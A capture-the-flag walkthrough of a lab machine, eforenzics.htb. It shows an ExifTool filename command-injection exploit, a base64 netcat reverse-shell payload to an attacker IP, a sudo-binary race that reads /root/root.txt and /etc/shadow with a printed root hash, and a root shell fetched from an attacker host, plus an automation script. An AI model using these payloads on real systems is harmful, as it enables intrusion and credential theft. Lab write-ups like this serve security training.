Scanning
> TARGET=10.129.10.189 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Domain: eforenzics.htb
- dirsearch
> dirsearch -u http://eforenzics.htb/
[16:13:10] 301 - 317B - /assets -> http://eforenzics.htb/assets/
[16:13:10] 403 - 279B - /assets/
[16:13:42] 200 - 11KB - /index.html
[16:14:29] 200 - 4KB - /upload.php
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://eforenzics.htb/" -H "Host: FUZZ.eforenzics.htb"
- Uploading a test image to /upload.php returns the ExifTool output for the file, which leaks the ExifTool version:
ExifTool Version Number : 12.37
File Name : test.png
Directory : .
File Size : 627 bytes
File Modification Date/Time : 2023:01:22 21:22:43+00:00
File Access Date/Time : 2023:01:22 21:22:43+00:00
File Inode Change Date/Time : 2023:01:22 21:22:43+00:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 297
Image Height : 167
Bit Depth : 8
Color Type : RGB
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Significant Bits : 8 8 8
Comment :
Image Size : 297x167
Megapixels : 0.050
- Searching for this version finds CVE-2022-23935: ExifTool before 12.38 hands the filename to Perl's two-argument open(), so a filename ending in `|` is executed as a shell command.
# upload an image whose filename is: <cmd>|
Content-Disposition: form-data; name="image"; filename="wget <attacker-ip>|"
Content-Type: image/png
# kali
> nc -vnlp 80
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.129.10.189.
Ncat: Connection from 10.129.10.189:55702.
GET / HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: <attacker-ip>
Connection: Keep-Alive
- To get a shell, base64-encode the command and pipe it into sh. The filename is used as a path on the server, so it cannot contain `/`, and it sits in a double-quoted header, so it cannot contain `"`; the base64 form keeps both out (check the encoded blob itself contains no `/`).
# eg: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc <attacker-ip> 4444 >/tmp/f
Content-Disposition: form-data; name="image"; filename="echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTAuMTAuMTYuNzAgNDQ0NCA+L3RtcC9m | base64 -d | sh |"
User: smorton
- A cron job wipes the upload directories every five minutes, so an uploaded payload does not stay on disk for long:
*/5 * * * * date >> /usr/local/investigation/analysed_log && echo "Clearing folders" >> /usr/local/investigation/analysed_log && rm -r /var/www/uploads/* && rm /var/www/html/analysed_images/*
- Found Windows Event Logs for Analysis.msg in /usr/local/investigation:
www-data@investigation:/usr/local/investigation$ ls -la
total 1288
drwxr-xr-x 2 root root 4096 Sep 30 23:43 .
drwxr-xr-x 11 root root 4096 Aug 27 21:54 ..
-rw-rw-r-- 1 smorton smorton 1308160 Oct 1 00:35 Windows Event Logs for Analysis.msg
-rw-rw-r-- 1 www-data www-data 0 Oct 1 00:40 analysed_log
Windows Event Logs for Analysis.msg is an Outlook message in OLE compound-file format; 7z extracts its streams into a tree of folders and files. The attachment data stream is itself a zip archive containing security.evtx:
Investigation/log/__attach_version1.0_#00000000/__substg1.0_37010102
# rename the stream to .zip and unzip it to get security.evtx
- Open security.evtx in Windows Event Viewer and filter on Audit Failure. One credential-validation failure (Event ID 4776) has a "Logon Account" that is not an account name but a password: error 0xC0000064 means the user name does not exist, i.e. someone typed their password into the username field. It is smorton's password.
The computer attempted to validate the credentials for an account.
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Account: Def@ultf0r3nz!csPa$$
Source Workstation: EFORENZICS-DI
Error Code: 0xC0000064
- Log in over SSH as smorton with that password to get the user flag.
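The triage above is done in Event Viewer. As an added example (not from the writeup), the same filter done offline on an XML export of security.evtx (Event Viewer's Save As XML, or evtx_dump output) flags 4776 failures whose "logon account" does not look like an account name, which is exactly how a password typed into the username field shows up. The three records are constructed sample data in the Windows event XML format, not the machine's real log; the account-name regex is an assumption.

```python
"""Added example, not from the original writeup: find 4776 failures where the
"account" is really a password. Input is an XML export of an .evtx file."""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# NTLM credential-validation (4776) status codes relevant here.
STATUS_NO_SUCH_USER = "0xc0000064"    # user name does not exist
STATUS_WRONG_PASSWORD = "0xc000006a"  # wrong password for an existing user

# Constructed sample export: a success, a wrong-password failure, and a
# "no such user" failure whose account field is clearly a password.
SAMPLE_EVTX_XML = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID>4776</EventID><Computer>EFORENZICS-DI</Computer></System>
  <EventData>
    <Data Name="PackageName">MICROSOFT_AUTHENTICATION_PACKAGE_V1_0</Data>
    <Data Name="TargetUserName">smorton</Data>
    <Data Name="Workstation">EFORENZICS-DI</Data>
    <Data Name="Status">0x0</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID>4776</EventID><Computer>EFORENZICS-DI</Computer></System>
  <EventData>
    <Data Name="PackageName">MICROSOFT_AUTHENTICATION_PACKAGE_V1_0</Data>
    <Data Name="TargetUserName">smorton</Data>
    <Data Name="Workstation">EFORENZICS-DI</Data>
    <Data Name="Status">0xC000006A</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID>4776</EventID><Computer>EFORENZICS-DI</Computer></System>
  <EventData>
    <Data Name="PackageName">MICROSOFT_AUTHENTICATION_PACKAGE_V1_0</Data>
    <Data Name="TargetUserName">Def@ultf0r3nz!csPa$$</Data>
    <Data Name="Workstation">EFORENZICS-DI</Data>
    <Data Name="Status">0xC0000064</Data>
  </EventData>
</Event>
</Events>"""

# Assumed shape of a sAMAccountName: letters, digits, . _ - and a trailing $
# for computer accounts. Anything else in a "user name" is suspicious.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}\$?$")


def parse_events(xml_text):
    """Flatten each <Event> into a dict of EventID plus its EventData fields."""
    root = ET.fromstring(xml_text)
    events = []
    for ev in root.iter("{%s}Event" % NS["e"]):
        rec = {"EventID": ev.findtext("e:System/e:EventID", namespaces=NS)}
        for d in ev.findall("e:EventData/e:Data", NS):
            rec[d.get("Name")] = d.text or ""
        events.append(rec)
    return events


def looks_like_username(name):
    return bool(USERNAME_RE.match(name))


def find_leaked_credentials(events):
    """4776 'no such user' failures whose account field is not a plausible name."""
    hits = []
    for rec in events:
        if rec.get("EventID") != "4776":
            continue
        status = rec.get("Status", "").lower()
        if status != STATUS_NO_SUCH_USER:
            continue  # wrong-password failures name a real user, not a secret
        if not looks_like_username(rec.get("TargetUserName", "")):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_leaked_credentials(parse_events(SAMPLE_EVTX_XML)):
        print("possible password in username field:", hit["TargetUserName"],
              "from", hit.get("Workstation"))
```

Wrong-password failures (0xC000006A) are deliberately skipped: they name a real account, so the field is not a secret; the interesting case is an account that does not exist.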
Root
smorton@investigation:~$ sudo -l
Matching Defaults entries for smorton on investigation:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User smorton may run the following commands on investigation:
(root) NOPASSWD: /usr/bin/binary
- Reverse the binary with Ghidra; decompiled main:
// main.c
undefined8 main(int param_1,long param_2)
{
__uid_t _Var1;
int iVar2;
FILE *__stream;
undefined8 uVar3;
char *__s;
char *__s_00;
if (param_1 != 3) {
puts("Exiting... ");
/* WARNING: Subroutine does not return */
exit(0);
}
_Var1 = getuid();
if (_Var1 != 0) {
puts("Exiting... ");
/* WARNING: Subroutine does not return */
exit(0);
}
iVar2 = strcmp(*(char **)(param_2 + 0x10),"lDnxUysaQn");
if (iVar2 != 0) {
puts("Exiting... ");
/* WARNING: Subroutine does not return */
exit(0);
}
puts("Running... ");
__stream = fopen(*(char **)(param_2 + 0x10),"wb");
uVar3 = curl_easy_init();
curl_easy_setopt(uVar3,0x2712,*(undefined8 *)(param_2 + 8));
curl_easy_setopt(uVar3,0x2711,__stream);
curl_easy_setopt(uVar3,0x2d,1);
iVar2 = curl_easy_perform(uVar3);
if (iVar2 == 0) {
iVar2 = snprintf((char *)0x0,0,"%s",*(undefined8 *)(param_2 + 0x10));
__s = (char *)malloc((long)iVar2 + 1);
snprintf(__s,(long)iVar2 + 1,"%s",*(undefined8 *)(param_2 + 0x10));
iVar2 = snprintf((char *)0x0,0,"perl ./%s",__s);
__s_00 = (char *)malloc((long)iVar2 + 1);
snprintf(__s_00,(long)iVar2 + 1,"perl ./%s",__s);
fclose(__stream);
curl_easy_cleanup(uVar3);
setuid(0);
system(__s_00);
system("rm -f ./lDnxUysaQn");
return 0;
}
puts("Exiting... ");
/* WARNING: Subroutine does not return */
exit(0);
}
- main() requires exactly two arguments and uid 0 (hence sudo). argv[1] goes to curl_easy_setopt option 0x2712 (10002, CURLOPT_URL, https://curl.se/mail/archive-2004-07/0100.html); option 0x2711 (10001, CURLOPT_WRITEDATA) points the download at a file opened with fopen(argv[2], "wb"), and 0x2d (45) is CURLOPT_FAILONERROR. argv[2] must equal the hard-coded string lDnxUysaQn, which is therefore also the name of the temporary file written in the current directory. After the download the file is executed as root with `perl ./lDnxUysaQn` and then deleted.
- The URL is entirely ours, so CURLOPT_URL can point at a local file, e.g. file:///root/root.txt: the binary copies it into ./lDnxUysaQn (created world-readable under root's umask) before perl fails on it and it is removed, so a loop reading the file wins the race:
# session 1, constantly read the lDnxUysaQn file and dump info into tmp
> while true; do cat lDnxUysaQn >> tmp; done
# session 2, keep running the process for session 1 to capture the flag
> sudo /usr/bin/binary file:///root/root.txt lDnxUysaQn
- The same race reads /root/root.txt and /etc/shadow:
# shadow
root:$6$8KeEz2EYMU05RVyS$W5GGqM4AHw3D1tLul.LJN2BPUhqEdflA.yCQyu7/c2PtZmbAn6qevqSaUlFyhPQbgbhFmDB00I3Of7qPep2WP/:19233:0:99999:7:::
# or skip the race: serve a root.pl on kali that contains
exec "/bin/bash";
# and have the binary fetch and run it as root
> sudo /usr/bin/binary http://<attacker-ip>/root.pl lDnxUysaQn
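The two-session race above, as an added example (not from the original writeup) that runs the reader loop in the background of one script and de-duplicates what it captures. The binary path and token are the writeup's; the stand-in command used to exercise the function without the target is an assumption. The race works because the binary creates the file with fopen() under root's normal umask, so it is readable by the unprivileged user during the short window before `rm -f`.

```shell
#!/bin/sh
# Added example, not part of the original writeup: automate the read-any-file
# race against /usr/bin/binary. Run as root via sudo, the binary downloads
# argv[1] into ./lDnxUysaQn, runs "perl ./lDnxUysaQn", then deletes it.

TMPNAME=lDnxUysaQn

# race_read CMD... : run CMD while a background loop copies $TMPNAME as fast
# as it can, then print the unique lines captured (the loop sees the same
# content many times, hence sort -u).
race_read() {
    out=$(mktemp)
    ( while :; do cat "$TMPNAME" 2>/dev/null; done >> "$out" ) &
    reader=$!
    "$@" >/dev/null 2>&1 || true
    kill "$reader" 2>/dev/null || true
    wait "$reader" 2>/dev/null || true
    sort -u "$out"
    rm -f "$out"
}

# read_root_file PATH : leak a local file through the file:// URL scheme.
read_root_file() {
    race_read sudo /usr/bin/binary "file://$1" "$TMPNAME"
}

# Usage on the target, from a directory where the temp file will be written:
# read_root_file /root/root.txt
# read_root_file /etc/shadow
# For a shell no race is needed: serve root.pl containing  exec "/bin/bash";
# and run  sudo /usr/bin/binary http://<attacker-ip>/root.pl lDnxUysaQn
```

The capture is line-based, so a file written in several chunks could be caught half-written; for small files fetched over file:// curl writes once, which is why the plain cat loop in the writeup was enough.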